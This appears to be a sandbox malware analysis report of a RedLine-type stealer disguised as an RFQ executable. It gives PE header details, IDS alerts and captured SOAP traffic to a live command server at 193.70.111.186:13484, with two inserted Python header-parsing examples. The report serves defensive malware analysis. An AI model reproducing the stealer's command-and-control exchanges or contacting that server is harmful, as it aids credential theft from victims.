                                                                                          SSDEEP:6144:CSvfpi6ceLP/9skLmb0OTuWSPHaJG8nAgeMZMMhA2fX4WABlEnNt0uhiTw:RvloTuW+EZMM6DFyT03w
                                                                                          MD5:F65C62DAC893E859E0E0A3425BBCF3E0
                                                                                          SHA1:B3D112CA4B59F432496A8FB6F7B1194537BC0A31
                                                                                          SHA-256:38BC0E5597BEC50BDF1E0FD95882AA61F976D50508B947D065FAA2790BBEA681
                                                                                          SHA-512:4E8AF993F744768C7CDAC3EFB3863ED46A96EE9FE25D49B9017CDDCF59496CACB7BD0D0F75B472D9042246EAEFBA84F1159B9A017CBFC91C7269B1886208A22B
                                                                                          Malicious:false
                                                                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmV....9..............................................................................................................................................................................................................................................................................................................................................'y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
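The 106,496-byte databases dropped by CasPol.exe above are characterised entirely from their 100-byte SQLite header (page size 2048, file counter 3, 52 pages, cookie 0x21, schema format 4, UTF-8, version-valid-for 3, written by SQLite 3.42.0). The following Python is a worked example added here, not code from the report, that decodes that header and performs the completeness check a responder wants before opening a copied database: the in-header page count is only trustworthy when version-valid-for equals the change counter, and page size times page count (2048 x 52 = 106,496) must equal the file size, which it does for these three files. The header bytes are constructed inline from the report's values; they are not the dropped file.

```python
import struct

SQLITE_MAGIC = b"SQLite format 3\0"
# 100-byte database header; every multi-byte field is big-endian (offsets per the SQLite file-format spec)
HEADER_FMT = ">16sH6B12I20sII"
ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def build_sample_header(pages=52, change_counter=3, schema_cookie=0x21, schema_format=4,
                        version=3042000, page_size=2048, version_valid_for=None) -> bytes:
    """Constructed header carrying the values from the report's File Type line; not the dropped file."""
    if version_valid_for is None:
        version_valid_for = change_counter
    return struct.pack(HEADER_FMT, SQLITE_MAGIC, page_size,
                       1, 1, 0, 64, 32, 32,                  # write/read version, reserved bytes, payload fractions
                       change_counter, pages, 0, 0,          # file change counter, page count, freelist trunk/count
                       schema_cookie, schema_format, 0, 0,   # schema cookie/format, cache size, largest root page
                       1, 0, 0, 0,                           # text encoding (1 = UTF-8), user version, incr-vacuum, app id
                       b"\0" * 20, version_valid_for, version)


def parse_sqlite_header(blob: bytes, file_size=None) -> dict:
    """Decode the header the way the report's File Type line does, then check the file is a whole database."""
    if len(blob) < 100 or blob[:16] != SQLITE_MAGIC:
        raise ValueError("not a SQLite 3 database")
    (_, page_size, _, _, reserved, _, _, _,
     change_counter, pages, _, _, cookie, schema_format, _, _, encoding, _, _, _,
     _, version_valid_for, version) = struct.unpack(HEADER_FMT, blob[:100])
    if page_size == 1:                      # the value 1 encodes the 65536-byte page size
        page_size = 65536
    info = {
        "page_size": page_size, "usable_page_size": page_size - reserved,
        "file_counter": change_counter, "pages": pages,
        "cookie": cookie, "schema_format": schema_format,
        "encoding": ENCODINGS.get(encoding, f"unknown({encoding})"),
        "version": f"{version // 1000000}.{version // 1000 % 1000}.{version % 1000}",
        "version_valid_for": version_valid_for,
        # The in-header page count is authoritative only if it was written by the same change that
        # bumped the file counter; writers older than SQLite 3.7.0 leave it stale.
        "page_count_valid": version_valid_for == change_counter,
    }
    if file_size is not None:
        info["expected_size"] = page_size * pages
        info["complete"] = info["page_count_valid"] and file_size == info["expected_size"]
    return info


if __name__ == "__main__":
    print(parse_sqlite_header(build_sample_header(), file_size=106496))
```

For a file on disk, pass the first 100 bytes and os.path.getsize() of the file; a copy whose size is not a whole number of pages, or whose version-valid-for lags the change counter, was truncated or taken mid-write and should be opened with that caveat in mind.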
                                                                                          File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):4.149547776787964
                                                                                          TrID:
                                                                                          • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                          • Win64 Executable GUI (202006/5) 46.43%
                                                                                          • Win64 Executable (generic) (12005/4) 2.76%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                          • DOS Executable Generic (2002/1) 0.46%
                                                                                          File name:RFQ_TFS-1508-AL NASR ENGINEERING.exe
                                                                                          File size:2'875'465 bytes
                                                                                          MD5:51e2a4cf52a06bff7b50826173d6a0ad
                                                                                          SHA1:d5450d3259df08a3d0c0a0b91b586e8532fab2e0
                                                                                          SHA256:7087a8601eecc0ad79246fe0eb6cb2e9562b510495281dfe4c6df888b2b22b43
                                                                                          SHA512:95151da1e94e93497e9786e5d6470573a4be00dba4f1d8228541c802cc57d9da2cdd13c1a0819a7e30673385fe863469bf0997d8e5405f2a5014a912229d4efa
                                                                                          SSDEEP:12288:GVfHSQAvvch1+6XDR/o9hcOPsBwlJgymOvujooTjaV:GZZAvvch06zNo9hcIlJljoTjaV
                                                                                          TLSH:74D51239B2531E6BFD2905B6C8D635F052FE1DA33AF18A2FDF19AD08598613D04B1871
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....a..........."...0.X&............... ....@...... ....................................`................................
                                                                                          Icon Hash:00928e8e8686b000
Entrypoint:0x400000 (equal to the Imagebase, i.e. AddressOfEntryPoint is 0; a PE32+ .NET assembly carries no native entry stub and execution starts at the managed entry point referenced from the CLR header)
Entrypoint Section: (none, because the entry point RVA is 0 and falls in the headers rather than in a section)
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x916198D0 [Wed Apr 17 05:40:32 2047 UTC] (a date after the analysis, so the field carries no usable build time; deterministic .NET builds write a hash-derived value here, which is one common cause of such values)
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
Import Hash: (empty: the image has no import table, see IMAGE_DIRECTORY_ENTRY_IMPORT below, so no imphash can be computed and imphash-based pivoting will not work for this sample)
Instruction (bytes decoded at the entry point; since the entry point RVA is 0, these are the first twelve bytes of the DOS header, 4D 5A 90 00 03 00 00 00 04 00 00 00, read as x86 code, not program logic)
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x6000           0x5a6         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x463c           0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2000           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name   Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text  0x2000           0x2658        0x2800    7607faacd2bdf2fcc21ebaac63b124ca  False     0.543359375         data       5.706222813860211   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc  0x6000           0x5a6         0x600     9a9b1eb281957316b1b1779ad352807f  False     0.4147135416666667  data       4.056084266397839   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
The two sections account for only 0x2e00 (11,776) bytes of raw data, yet the file is 2,875,465 bytes long: almost the whole file lies outside the mapped sections as an overlay, which is also why the overall entropy (4.15) is far below the .text entropy (5.71).
Name         RVA     Size   Type                                                                              Language  Country  ZLIB Complexity
RT_VERSION   0x60a0  0x31c  data                                                                                                  0.4296482412060301
RT_MANIFEST  0x63bc  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                      0.5489795918367347
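The static fields above (entry point equal to the image base, an empty import table and import hash, a CLR header at 0x2000, a 2047 timestamp, and two small sections inside a 2.8 MB file) can all be recovered from the raw PE headers with a few struct reads. The following Python is a worked example added here; it is not part of the Joe Sandbox report and is not the sample's own code. Because the sample itself is not available offline, the script first constructs a stand-in PE32+ image that carries the header values listed in this report with zero-filled section bodies and overlay, then parses it back. The high-bit heuristic in timestamp_verdict reflects how deterministic .NET (Roslyn) builds fill the TimeDateStamp field with a content hash; treat its output as an indicator, not proof of the toolchain.

```python
import struct
from datetime import datetime, timedelta, timezone

# Data-directory slots used by the report (PE/COFF spec numbering)
DIR_IMPORT, DIR_RESOURCE, DIR_DEBUG, DIR_COM_DESCRIPTOR = 1, 2, 6, 14
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def build_sample_pe(file_size=2_875_465, timestamp=0x916198D0) -> bytes:
    """Constructed stand-in for the analysed file (not the sample itself): the header
    values from the report, zero-filled section bodies and a zero-filled overlay."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew -> PE signature
    # COFF header: x86-64, 2 sections, SizeOfOptionalHeader=240, EXECUTABLE_IMAGE|LARGE_ADDRESS_AWARE
    coff = struct.pack("<HHIIIHH", 0x8664, 2, timestamp, 0, 0, 240, 0x0022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                       # PE32+ magic
    struct.pack_into("<I", opt, 16, 0)                          # AddressOfEntryPoint = 0 (managed image)
    struct.pack_into("<Q", opt, 24, 0x400000)                   # ImageBase
    struct.pack_into("<I", opt, 108, 16)                        # NumberOfRvaAndSizes
    for idx, rva, size in ((DIR_RESOURCE, 0x6000, 0x5A6), (DIR_DEBUG, 0x463C, 0x1C),
                           (DIR_COM_DESCRIPTOR, 0x2000, 0x48)):
        struct.pack_into("<II", opt, 112 + 8 * idx, rva, size)
    # Section headers: name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ..., Characteristics
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x2658, 0x2000, 0x2800, 0x200, 0, 0, 0, 0, 0x60000020)
    sec += struct.pack("<8sIIIIIIHHI", b".rsrc", 0x5A6, 0x6000, 0x600, 0x2A00, 0, 0, 0, 0, 0x40000040)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec).ljust(0x200, b"\0")
    image = headers + bytes(0x2800 + 0x600)                     # zero-filled section bodies
    return image.ljust(file_size, b"\0")                        # everything past 0x3000 is overlay


def parse_pe(data: bytes) -> dict:
    """Recover the report's static fields: timestamp, entry point, CLR header, imports, sections, overlay."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
        raise ValueError("only PE32+ is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    ndirs = struct.unpack_from("<I", data, opt + 108)[0]
    dirs = [struct.unpack_from("<II", data, opt + 112 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_size": raw_size, "raw_ptr": raw_ptr})
    mapped_end = max(s["raw_ptr"] + s["raw_size"] for s in sections)   # last byte covered by any section
    clr = dirs[DIR_COM_DESCRIPTOR] if ndirs > DIR_COM_DESCRIPTOR else (0, 0)
    return {
        "machine": machine, "characteristics": chars,
        "timestamp": ts, "timestamp_utc": EPOCH + timedelta(seconds=ts),
        "entry_rva": entry_rva, "entry_va": image_base + entry_rva,
        "is_dotnet": clr[0] != 0, "clr_dir": clr,
        "has_imports": ndirs > DIR_IMPORT and dirs[DIR_IMPORT][0] != 0,
        "sections": sections,
        "overlay_size": len(data) - mapped_end,          # bytes appended after the mapped sections
    }


def timestamp_verdict(ts: int, analysed_at: int) -> str:
    """Classify a COFF TimeDateStamp against the analysis time (both Unix seconds).
    Deterministic .NET builds store a content hash with the high bit set, so such values are not build times."""
    if ts & 0x80000000:
        return "hash-like (high bit set, not a build time)"
    if ts > analysed_at:
        return "future"
    return "plausible"


if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    analysis_time = 1_731_888_000                                 # 2024-11-18 00:00 UTC, the report's analysis day
    print(f"entry VA 0x{info['entry_va']:x}, .NET={info['is_dotnet']}, imports={info['has_imports']}, "
          f"timestamp {info['timestamp_utc']:%a %b %d %H:%M:%S %Y} UTC, overlay {info['overlay_size']} bytes, "
          f"verdict: {timestamp_verdict(info['timestamp'], analysis_time)}")
```

Run against the constructed image, the parser reproduces the report: entry VA 0x400000, a CLR header at (0x2000, 0x48), no import directory, the Wed Apr 17 05:40:32 2047 timestamp flagged as hash-like, and an overlay of 2,863,177 bytes. To use it on a real file, replace build_sample_pe() with the file's bytes; the overlay size is the first number worth carving when a tiny .NET loader stub sits in front of a multi-megabyte file.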
Timestamp                        SID      Signature                                                                Severity  Source IP       Source Port  Dest IP         Dest Port  Protocol
2024-11-18T17:34:02.747716+0100  2849662  ETPRO MALWARE RedLine - CheckConnect Request                             1         192.168.2.5     49704        193.70.111.186  13484      TCP
2024-11-18T17:34:08.091098+0100  2045000  ET MALWARE RedLine Stealer - CheckConnect Response                       1         193.70.111.186  13484        192.168.2.5     49704      TCP
2024-11-18T17:34:08.431819+0100  2849351  ETPRO MALWARE RedLine - EnvironmentSettings Request                      1         192.168.2.5     49704        193.70.111.186  13484      TCP
2024-11-18T17:34:11.786245+0100  2045001  ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound       1         193.70.111.186  13484        192.168.2.5     49704      TCP
2024-11-18T17:34:11.786245+0100  2046056  ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)        1         193.70.111.186  13484        192.168.2.5     49704      TCP
2024-11-18T17:34:12.872627+0100  2849352  ETPRO MALWARE RedLine - SetEnvironment Request                           1         192.168.2.5     49714        193.70.111.186  13484      TCP
2024-11-18T17:34:14.203778+0100  2848200  ETPRO MALWARE RedLine - GetUpdates Request                               1         192.168.2.5     49717        193.70.111.186  13484      TCP
Timestamp                          Source Port  Dest Port  Source IP       Dest IP
Nov 18, 2024 17:34:01.840709925 CET  49704      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:01.846985102 CET  13484      49704      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:01.847074986 CET  49704      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:01.866641045 CET  49704      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:01.871848106 CET  13484      49704      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:02.216644049 CET  49704      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:02.221813917 CET  13484      49704      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:02.693150043 CET  13484      49704      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:02.747715950 CET  49704      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:07.762092113 CET  49704      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:07.762093067 CET  49704      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:08.076047897 CET  49704      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:08.091098070 CET  13484      49704      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:08.091116905 CET  13484      49704      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:08.091130018 CET  13484      49704      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:08.431598902 CET  13484      49704      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:08.431638002 CET  13484      49704      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:08.431649923 CET  13484      49704      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:08.431657076 CET  13484      49704      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:08.431818962 CET  49704      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:11.780792952 CET  49704      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:11.781157017 CET  49714      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:11.786245108 CET  13484      49704      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.786314011 CET  49704      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:11.786685944 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.786747932 CET  49714      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:11.786926985 CET  49714      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:11.786986113 CET  49714      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:11.792069912 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.792083979 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.792093039 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.792103052 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.792110920 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.792119980 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.792126894 CET  49714      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:11.792131901 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.792141914 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.792176008 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.792179108 CET  49714      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:11.792200089 CET  49714      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:11.792215109 CET  49714      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:11.792300940 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.792347908 CET  49714      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:11.797350883 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.797365904 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.797374964 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.797384977 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.797396898 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.797405958 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:11.797408104 CET  49714      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:11.797436953 CET  49714      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:11.845139980 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:12.825676918 CET  13484      49714      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:12.827007055 CET  49717      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:12.831980944 CET  13484      49717      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:12.832060099 CET  49717      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:12.832226992 CET  49717      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:12.837382078 CET  13484      49717      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:12.872627020 CET  49714      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:13.185286045 CET  49717      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:13.190232992 CET  13484      49717      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:13.190246105 CET  13484      49717      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:13.190254927 CET  13484      49717      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:13.190269947 CET  13484      49717      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:13.190291882 CET  49717      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:13.190329075 CET  49717      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:13.190381050 CET  13484      49717      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:13.190423012 CET  13484      49717      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:13.190433025 CET  13484      49717      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:13.190443039 CET  13484      49717      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:13.190455914 CET  13484      49717      193.70.111.186  192.168.2.5
Nov 18, 2024 17:34:13.190469980 CET  49717      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:13.190494061 CET  49717      13484      192.168.2.5     193.70.111.186
Nov 18, 2024 17:34:13.190794945 CET  13484      49717      193.70.111.186  192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.190846920 CET4971713484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:13.195231915 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.195306063 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.195327997 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.195338011 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.195348978 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.195400953 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.195619106 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:13.241101027 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:14.162611961 CET1348449717193.70.111.186192.168.2.5
                                                                                          Nov 18, 2024 17:34:14.203552008 CET4971413484192.168.2.5193.70.111.186
                                                                                          Nov 18, 2024 17:34:14.203778028 CET4971713484192.168.2.5193.70.111.186
                                                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                          Nov 18, 2024 17:34:08.477482080 CET | 60445 | 53 | 192.168.2.5 | 1.1.1.1
                                                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                          Nov 18, 2024 17:34:08.477482080 CET | 192.168.2.5 | 1.1.1.1 | 0x8904 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false
                                                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                          Nov 18, 2024 17:34:08.490418911 CET | 1.1.1.1 | 192.168.2.5 | 0x8904 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net |  | CNAME (Canonical name) | IN (0x0001) | false
                                                                                          • 193.70.111.186:13484
                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          0 | 192.168.2.5 | 49704 | 193.70.111.186 | 13484 | 3168 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 18, 2024 17:34:01.866641045 CET | 241 | OUT | POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                          Host: 193.70.111.186:13484
                                                                                          Content-Length: 137
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Connection: Keep-Alive
                                                                                          Nov 18, 2024 17:34:02.693150043 CET | 359 | IN | HTTP/1.1 200 OK
                                                                                          Content-Length: 212
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Mon, 18 Nov 2024 16:34:01 GMT
                                                                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                          Nov 18, 2024 17:34:07.762092113 CET | 224 | OUT | POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                          Host: 193.70.111.186:13484
                                                                                          Content-Length: 144
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Nov 18, 2024 17:34:08.076047897 CET | 368 | OUT | POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                          Host: 193.70.111.186:13484
                                                                                          Content-Length: 144
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettings xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                          Nov 18, 2024 17:34:08.431598902 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                          Content-Length: 4744
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Mon, 18 Nov 2024 16:34:08 GMT
